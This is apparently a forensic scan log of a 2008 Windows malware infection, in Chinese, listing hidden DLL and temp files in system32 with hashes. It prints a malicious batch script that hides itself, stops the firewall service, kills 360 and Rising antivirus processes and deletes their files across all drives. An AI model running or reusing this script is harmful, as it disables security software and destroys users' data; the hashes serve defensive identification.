获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:19:3
修改时间 : 2008-10-28 18:19:4
大小 : 11734 字节 11.470 KB
MD5 : f2a0be2ce40ac2edb6e1624f8ebba3f0
SHA1: 14C6C2BFCB21E3A41FCC82690B370AF642E8E01E
CRC32: eea12c1e

 

文件说明符 : C:/WINDOWS/system32/sys05020.add
属性 : A---
数字签名:否
PE文件:否
创建时间 : 2008-10-27 8:21:3
修改时间 : 2008-10-28 18:19:22
大小 : 2620 字节 2.572 KB
MD5 : 0798e535e371141f92d5f9b3ecefabf5
SHA1: 485CD5403430E750A46B7A71B2C6631AC4E8FDB2
CRC32: 460416b4

 

文件说明符 : C:/WINDOWS/system32/12B02216.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:19:26
修改时间 : 2008-10-28 18:19:28
大小 : 11720 字节 11.456 KB
MD5 : e69c275cd74d09682d82039e96efefc5
SHA1: 20CB99F1183B6FB8CD12635C4D46D1C995AD6F79
CRC32: 6f00b1ff

 

文件说明符 : C:/WINDOWS/system32/E4814792.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:19:31
修改时间 : 2008-10-28 18:19:32
大小 : 11190 字节 10.950 KB
MD5 : 2c1413973ea74130c1c9cc35045dbc06
SHA1: F0E3F7AB82544AD7E49D8407D34E26B21FF99FB9
CRC32: 8b99202e

 

文件说明符 : C:/WINDOWS/system32/122B901E.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:19:42
修改时间 : 2008-10-28 18:19:42
大小 : 12641 字节 12.353 KB
MD5 : b0424d212b295f2def5666d7e80a8e8b
SHA1: 7C84054995644C419AF2B4B55C63BA71041330F6
CRC32: 7dbdd21a

 

文件说明符 : C:/WINDOWS/system32/9F684DE8.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:19:47
修改时间 : 2008-10-28 18:19:48
大小 : 11327 字节 11.63 KB
MD5 : 87576681eb5b0a9a761461d3127331b2
SHA1: 27D70C0507CB9A5DB1C393D663D837599885BBF9
CRC32: 7fbe4e33

 

文件说明符 : C:/WINDOWS/system32/22D75360.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:19:54
修改时间 : 2008-10-28 18:19:56
大小 : 216640 字节 211.576 KB
MD5 : 2795616231b69c5c7d8077920f0fbfac
SHA1: F9848F573FC6A939F665EFB3EC4C1E2534DEC27D
CRC32: 955b3f0d

文件说明符 : C:/WINDOWS/system32/cmd.bat
属性 : ASHR
数字签名:否
PE文件:否
创建时间 : 2008-10-27 8:32:31
修改时间 : 2008-10-27 8:32:30
大小 : 453 字节
MD5 : 772239043c342a30a43bb81a69380492
SHA1: D9271F07120B4EAAE10FEF272D4B3879820AAEE4
CRC32: 0a2a1b09

 

C:/WINDOWS/system32/cmd.bat
/---
@echo off
set s=TASKKILL
copy %0 %windir%/system32/cmd.bat
attrib %windir%/system32/cmd.bat +r +s +h
net stop sharedaccess >nul
%s% /im 360* /f >nul
%s% /im RStray /f >nul
net stop Shadow" "System" "Service
set alldrive=d e f g h i j k l m n o p q r s t u v w x y z
for %%a in (c %alldrive%) do del %%a:/360* /f /s /q >nul
for %%a in (c %alldrive%) do del %%a:/修复* /f /s /q >nul
for %%a in (c %alldrive%) do del %%a:/RStray* /f /s /q >nul
---/

 

文件说明符 : C:/WINDOWS/system32/5F.tmp
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-27 13:28:18
修改时间 : 2008-10-27 13:22:22
大小 : 24576 字节 24.0 KB
MD5 : 67b253933b796c4ac8dbe22db4dd3785
SHA1: 2253053F01EF5B4522BBAC55C8C29B0BEE57A244
CRC32: 73e592ac

 

文件说明符 : C:/WINDOWS/system32/87.tmp
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-27 13:28:25
修改时间 : 2008-10-27 13:22:28
大小 : 16896 字节 16.512 KB
MD5 : 6fbcc4677b89570e1d0668823a394191
SHA1: 9FF17AC106C3A714E46AE7B79BD9B03F4157D920
CRC32: cae0840f

 

文件说明符 : C:/WINDOWS/system32/8A.tmp
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-27 13:28:32
修改时间 : 2008-10-27 13:22:36
大小 : 16384 字节 16.0 KB
MD5 : 514e2ae1783277d36642d56cbec4066a
SHA1: 7D76F2A442ED60E050CF8E0E8464DEC68B7DC467
CRC32: 45e0d755

 

文件说明符 : C:/WINDOWS/system32/8C.tmp
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-27 13:28:39
修改时间 : 2008-10-27 13:22:44
大小 : 28672 字节 28.0 KB
MD5 : f89fc58ea4797f8c688e7442545d6d42
SHA1: C6ACFFBA60254CC0330A35C733A69F21CBBA07EA
CRC32: b354e5d0

 

文件说明符 : C:/WINDOWS/system32/91.tmp
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-27 13:29:18
修改时间 : 2008-10-27 13:28:20
大小 : 24576 字节 24.0 KB
MD5 : 67b253933b796c4ac8dbe22db4dd3785
SHA1: 2253053F01EF5B4522BBAC55C8C29B0BEE57A244
CRC32: 73e592ac

 

文件说明符 : C:/WINDOWS/system32/93.tmp
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-27 13:29:24
修改时间 : 2008-10-27 13:28:26
大小 : 16896 字节 16.512 KB
MD5 : 6fbcc4677b89570e1d0668823a394191
SHA1: 9FF17AC106C3A714E46AE7B79BD9B03F4157D920
CRC32: cae0840f

 

文件说明符 : C:/WINDOWS/system32/95.tmp
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-27 13:29:31
修改时间 : 2008-10-27 13:28:34
大小 : 16384 字节 16.0 KB
MD5 : 514e2ae1783277d36642d56cbec4066a
SHA1: 7D76F2A442ED60E050CF8E0E8464DEC68B7DC467
CRC32: 45e0d755

 

文件说明符 : C:/WINDOWS/system32/97.tmp
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-27 13:29:37
修改时间 : 2008-10-27 13:28:40
大小 : 28672 字节 28.0 KB
MD5 : f89fc58ea4797f8c688e7442545d6d42
SHA1: C6ACFFBA60254CC0330A35C733A69F21CBBA07EA
CRC32: b354e5d0

 

文件说明符 : C:/WINDOWS/system32/alivin.dll
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 12:36:49
修改时间 : 2008-10-28 17:15:38
大小 : 20480 字节 20.0 KB
MD5 : e8d4a85be238893fcf7af5d573769f3b
SHA1: 3E03D677C8ED8873593DFFCDD49A6BE6BFDCA21E
CRC32: 7998eac4


文件说明符 : C:/WINDOWS/jiocs.dll
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 11:27:50
修改时间 : 2008-10-21 11:27:52
大小 : 45568 字节 44.512 KB
MD5 : 98234e342fd2f84d60b53b7e2d6d1778
SHA1: C14956AA1A6F6DA550B98269B42FDCC2192AB771
CRC32: 1fd20380